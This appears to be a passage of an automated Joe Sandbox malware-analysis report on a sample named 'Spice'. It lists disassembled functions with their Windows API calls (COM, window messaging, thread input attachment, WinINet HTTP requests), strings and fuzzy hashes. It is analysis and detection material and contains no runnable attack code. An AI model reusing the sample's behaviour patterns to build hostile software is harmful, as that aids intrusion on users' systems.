SafeArrayDestroyData.OLEAUT32(?), ref: 00EC78F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC78FA
VariantClear.OLEAUT32(?), ref: 00EC790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC7917

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 26177172dabe2b387f31444a66f7dcdce89cf9c0bf89690e2a43901856747e0b
Instruction ID: e1ac8da97255c0f151d27ee245019b90aa65ac7cf16cf1f49a544d2f5a4e299f
Opcode Fuzzy Hash: 26177172dabe2b387f31444a66f7dcdce89cf9c0bf89690e2a43901856747e0b
Instruction Fuzzy Hash: EA415135A0021D9FCF04DF64C988EADBBB9FF48354F008069F955A7261CB31A946DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

CoInitialize.OLE32 ref: 00EE8AED
CoUninitialize.OLE32 ref: 00EE8AF8
CoCreateInstance.OLE32(?,00000000,00000017,00F03BBC,?), ref: 00EE8B58
IIDFromString.OLE32(?,?), ref: 00EE8BCB
VariantInit.OLEAUT32(?), ref: 00EE8C65
VariantClear.OLEAUT32(?), ref: 00EE8CC6

Strings

Invalid parameter, xrefs: 00EE8BE4
NULL Pointer assignment, xrefs: 00EE8B9D
Failed to create object, xrefs: 00EE8B63, 00EE8C19

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 8cc257a067f6a2a4823f099ff6a50d1f2136ae83324d6c74b44984ef84b36e29
Instruction ID: c746dd8d5095df38e9d2cda76c58ebc7eb3cd01d7e443051e865d6e262310299
Opcode Fuzzy Hash: 8cc257a067f6a2a4823f099ff6a50d1f2136ae83324d6c74b44984ef84b36e29
Instruction Fuzzy Hash: FD61CDB02087599FC710DF15CA88F6AB7E8BF45714F10584DF989AB291DB70ED48CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EDBB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EDBB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EDBB89
GetLastError.KERNEL32 ref: 00EDBB93
SetErrorMode.KERNEL32(00000000,READY), ref: 00EDBC00

Strings

READONLY, xrefs: 00EDBBCB
READY, xrefs: 00EDBBD9
UNKNOWN, xrefs: 00EDBBB8
INVALID, xrefs: 00EDBBD2
NOTREADY, xrefs: 00EDBBBF

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: cb34a07c356597e71c015dce2ebed36066e721c60274dbbea94ce92fe8c7ac18
Instruction ID: acce84ff0f735950ff5359c7484b2c32e7e9f3e81cf26739983e74a0b9654b65
Opcode Fuzzy Hash: cb34a07c356597e71c015dce2ebed36066e721c60274dbbea94ce92fe8c7ac18
Instruction Fuzzy Hash: 6E31AE35A00209EFCB10EF64C845EA9B7B8EF44304F15906BE80AF7395EB719942DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00ECB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EC9BCC
GetDlgCtrlID.USER32 ref: 00EC9BD7
GetParent.USER32 ref: 00EC9BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9BF6
GetDlgCtrlID.USER32(?), ref: 00EC9BFF
GetParent.USER32(?), ref: 00EC9C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9C1E

Strings

ListBox, xrefs: 00EC9B89
ComboBox, xrefs: 00EC9B54

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: a14e7138fe4a86521a4e6e383afb083180298679c335e5da2fae655281155b72
Instruction ID: 5bbd4bf3f04688493f4ca73c4dc6d62d5745935a0de7b29ce3dfeaa6529fe326
Opcode Fuzzy Hash: a14e7138fe4a86521a4e6e383afb083180298679c335e5da2fae655281155b72
Instruction Fuzzy Hash: 4121C474900108BBCF04AB60DC89EFEBBB9EF95310F101259F965A32A2DF7658169B20

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00ECB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EC9CB5
GetDlgCtrlID.USER32 ref: 00EC9CC0
GetParent.USER32 ref: 00EC9CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9CDF
GetDlgCtrlID.USER32(?), ref: 00EC9CE8
GetParent.USER32(?), ref: 00EC9D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9D07

Strings

ListBox, xrefs: 00EC9C74
ComboBox, xrefs: 00EC9C3F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 1f5093279aae14459c23e1e2e44b238b003a7a6e36fa21ed9ed562056eb39e0c
Instruction ID: 807ad82ff3fba806d6c3ddc0d5ecb9a169fafb74a77dc8b85bf1c23a0f218e62
Opcode Fuzzy Hash: 1f5093279aae14459c23e1e2e44b238b003a7a6e36fa21ed9ed562056eb39e0c
Instruction Fuzzy Hash: 7F21B375D00108BBDF04AB60CD85FFEBBB9EF94300F100155F955A71A2DF768926AB20

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00EC9D27
GetClassNameW.USER32(00000000,?,00000100), ref: 00EC9D3C
_wcscmp.LIBCMT ref: 00EC9D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EC9DC9

Strings

details, xrefs: 00EC9D77
largeicons, xrefs: 00EC9D5D
list, xrefs: 00EC9DAB
smallicons, xrefs: 00EC9D91
SHELLDLL_DefView, xrefs: 00EC9D48

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: b25932c979d1262d4373f9a038914806e2b9190b45441ef3efc7fc0bf270fde9
Instruction ID: 4ae4c17e5e0e63ca5d0e67ded61127bd5bc90fdb2aa6a99f7bc9276f98ed1655
Opcode Fuzzy Hash: b25932c979d1262d4373f9a038914806e2b9190b45441ef3efc7fc0bf270fde9
Instruction Fuzzy Hash: 52110A76248316BAFA102620ED0BEE77B9CDF05724F20201AF911B50E2FE67AA526552

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EE8FC1
CoInitialize.OLE32(00000000), ref: 00EE8FEE
CoUninitialize.OLE32 ref: 00EE8FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 00EE90F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00EE9225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F03BDC), ref: 00EE9259
CoGetObject.OLE32(?,00000000,00F03BDC,?), ref: 00EE927C
SetErrorMode.KERNEL32(00000000), ref: 00EE928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EE930F
VariantClear.OLEAUT32(?), ref: 00EE931F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 1040e5ac020f956ad75875c4ee71d9f9530e2e44f9d1d963e9e57f1be95eaf87
Instruction ID: 32b6aa00576067a1bf9932c72afb36d7ab8d92ae9fbf17656000ba777650cf98
Opcode Fuzzy Hash: 1040e5ac020f956ad75875c4ee71d9f9530e2e44f9d1d963e9e57f1be95eaf87
Instruction Fuzzy Hash: F8C137B1208349AFC704DF65C88496BB7E9FF89348F00591DF989AB262DB71ED05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00ED19CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00ED19EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A03
GetWindowThreadProcessId.USER32(00000000), ref: 00ED1A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ED1A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0A67,?,00000001), ref: 00ED1ABB

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: b280ff5c85efd656be9ba8356e178c1ea7d661dbea41279eea861f88313e0628
Instruction ID: f39ea66083bfcd22d7d84a9d7d2e48b341c9ea46fabd72a0ecf55cf4e663770f
Opcode Fuzzy Hash: b280ff5c85efd656be9ba8356e178c1ea7d661dbea41279eea861f88313e0628
Instruction Fuzzy Hash: DC31BDB1601308BFEB109F24DD48BA977ABEB543A9F104156F800E6290DBB89D429F60

Uniqueness

Uniqueness Score: -1.00%

Function 00EAC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00E7260D
SetTextColor.GDI32(?,000000FF), ref: 00E72617
SetBkMode.GDI32(?,00000001), ref: 00E7262C
GetStockObject.GDI32(00000005), ref: 00E72634
GetClientRect.USER32(?), ref: 00EAC0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 00EAC113
GetWindowDC.USER32(?), ref: 00EAC11F
GetPixel.GDI32(00000000,?,?), ref: 00EAC12E
ReleaseDC.USER32(?,00000000), ref: 00EAC140
GetSysColor.USER32(00000005), ref: 00EAC15E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 496e27b715c1f69fe4b07c8faeb04367c8f2dabd38519a2c2f368cfd75fde010
Instruction ID: 169c9ed5b9f234f6bead96435bcb589b665fb369e954719b9c4cf9b1d1124390
Opcode Fuzzy Hash: 496e27b715c1f69fe4b07c8faeb04367c8f2dabd38519a2c2f368cfd75fde010
Instruction Fuzzy Hash: 82114931500209BFDB616FA4EC08BE97BB2FB19325F144265FA69A50E1CF321991FF11

Uniqueness

Uniqueness Score: -1.00%

Function 00E7AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E7ADE1
OleUninitialize.OLE32(?,00000000), ref: 00E7AE80
UnregisterHotKey.USER32(?), ref: 00E7AFD7
DestroyWindow.USER32(?), ref: 00EB2F64
FreeLibrary.KERNEL32(?), ref: 00EB2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EB2FF6

Strings

close all, xrefs: 00E7ADDC

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 0683d1fddc8688d5952d137bf34b274bb951a84803fbc08be6fa2bbeb8f2e46b
Instruction ID: b08798f51fee492edf57168870583f82e78f333480158ea6a0f0b0afefff31df
Opcode Fuzzy Hash: 0683d1fddc8688d5952d137bf34b274bb951a84803fbc08be6fa2bbeb8f2e46b
Instruction Fuzzy Hash: E2A16D707012128FCB29EF14C495AAAF3A5FF44704F14A2ADE50EBB251DB31AD52CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00ECAD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00ECB13A), ref: 00ECB078

Strings

TEXT, xrefs: 00ECAFAF
NAME, xrefs: 00ECAEAA
REGEXPCLASS, xrefs: 00ECAE3D
INSTANCE, xrefs: 00ECAF86
CLASS, xrefs: 00ECADF7
CLASSNN, xrefs: 00ECAE1A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 06974a7b4f12022f087b2aeb9adda90da9e3dd738f53bce59b91ea4a4092f2c2
Instruction ID: a75b91dae434e8ac6f5c8c84ad735da1b156069377da2ad0f8a4803c341b39a1
Opcode Fuzzy Hash: 06974a7b4f12022f087b2aeb9adda90da9e3dd738f53bce59b91ea4a4092f2c2
Instruction Fuzzy Hash: 02917070600119DBCB18EF60C542FEAFBB5BF04308F54A12DE85AB7251DF31699AD7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E731F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00E7327E

Part of subcall function 00E7218F: GetClientRect.USER32(?,?), ref: 00E721B8
Part of subcall function 00E7218F: GetWindowRect.USER32(?,?), ref: 00E721F9
Part of subcall function 00E7218F: ScreenToClient.USER32(?,?), ref: 00E72221

GetDC.USER32 ref: 00EAD073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EAD086
SelectObject.GDI32(00000000,00000000), ref: 00EAD094
SelectObject.GDI32(00000000,00000000), ref: 00EAD0A9
ReleaseDC.USER32(?,00000000), ref: 00EAD0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EAD13C

Strings

U, xrefs: 00EAD011

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: bbfe789867eeb96c2e9dec52a46db044632a7f402573a37d1c731ef1ac78d30e
Instruction ID: 241d652e977eccbab25f2c3b2254ca1865326f2e6771a2cbc3b10cef1f79faa2
Opcode Fuzzy Hash: bbfe789867eeb96c2e9dec52a46db044632a7f402573a37d1c731ef1ac78d30e
Instruction Fuzzy Hash: C671E430408209DFCF219F64CC84AEA7BB6FF4E324F149269ED566A1A6C7319D41EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00EFC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

Part of subcall function 00E72714: GetCursorPos.USER32(?), ref: 00E72727
Part of subcall function 00E72714: ScreenToClient.USER32(00F377B0,?), ref: 00E72744
Part of subcall function 00E72714: GetAsyncKeyState.USER32(00000001), ref: 00E72769
Part of subcall function 00E72714: GetAsyncKeyState.USER32(00000002), ref: 00E72777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00EFC69C
ImageList_EndDrag.COMCTL32 ref: 00EFC6A2
ReleaseCapture.USER32 ref: 00EFC6A8
SetWindowTextW.USER32(?,00000000), ref: 00EFC752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EFC765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00EFC847

Strings

@GUI_DROPID, xrefs: 00EFC799
@GUI_DRAGFILE, xrefs: 00EFC7DC

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: daf1e552af52ae726ed045b3c3bea98596905af4d2a49d4d048195a45a44d626
Instruction ID: c7132b363c653fc57f57ad3860fe62616df8a303d47346b6debb06b4806f15a2
Opcode Fuzzy Hash: daf1e552af52ae726ed045b3c3bea98596905af4d2a49d4d048195a45a44d626
Instruction Fuzzy Hash: 1D51BF70108309AFD714EF24CC55FAA77E5FB84314F20851DF699A72E2CB31A945DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EE20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EE211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EE2148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EE218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EE219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE21AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EE21DC
InternetCloseHandle.WININET(00000000), ref: 00EE2223

Part of subcall function 00EE2B4F: GetLastError.KERNEL32(?,?,00EE1EE3,00000000,00000000,00000001), ref: 00EE2B64
Part of subcall function 00EE2B4F: SetEvent.KERNEL32(?,?,00EE1EE3,00000000,00000000,00000001), ref: 00EE2B79

Strings

, xrefs: 00EE21CD

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: ab220f53be5dc2eee0f4b18ff22f0b3d40ba1cdaa4d83739b21ef416e8c486fd
Instruction ID: 7f2a1051eee8dcbb1015f7ea2df77e536e86feb44f5a2eed55171c3a583ac5ce
Opcode Fuzzy Hash: ab220f53be5dc2eee0f4b18ff22f0b3d40ba1cdaa4d83739b21ef416e8c486fd
Instruction Fuzzy Hash: 93416CB150124CBFEB129F61CC89FBB7BACFB08354F00511AFB05AA251DB759E449BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EE9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F00980), ref: 00EE9412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F00980), ref: 00EE9446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EE95C0
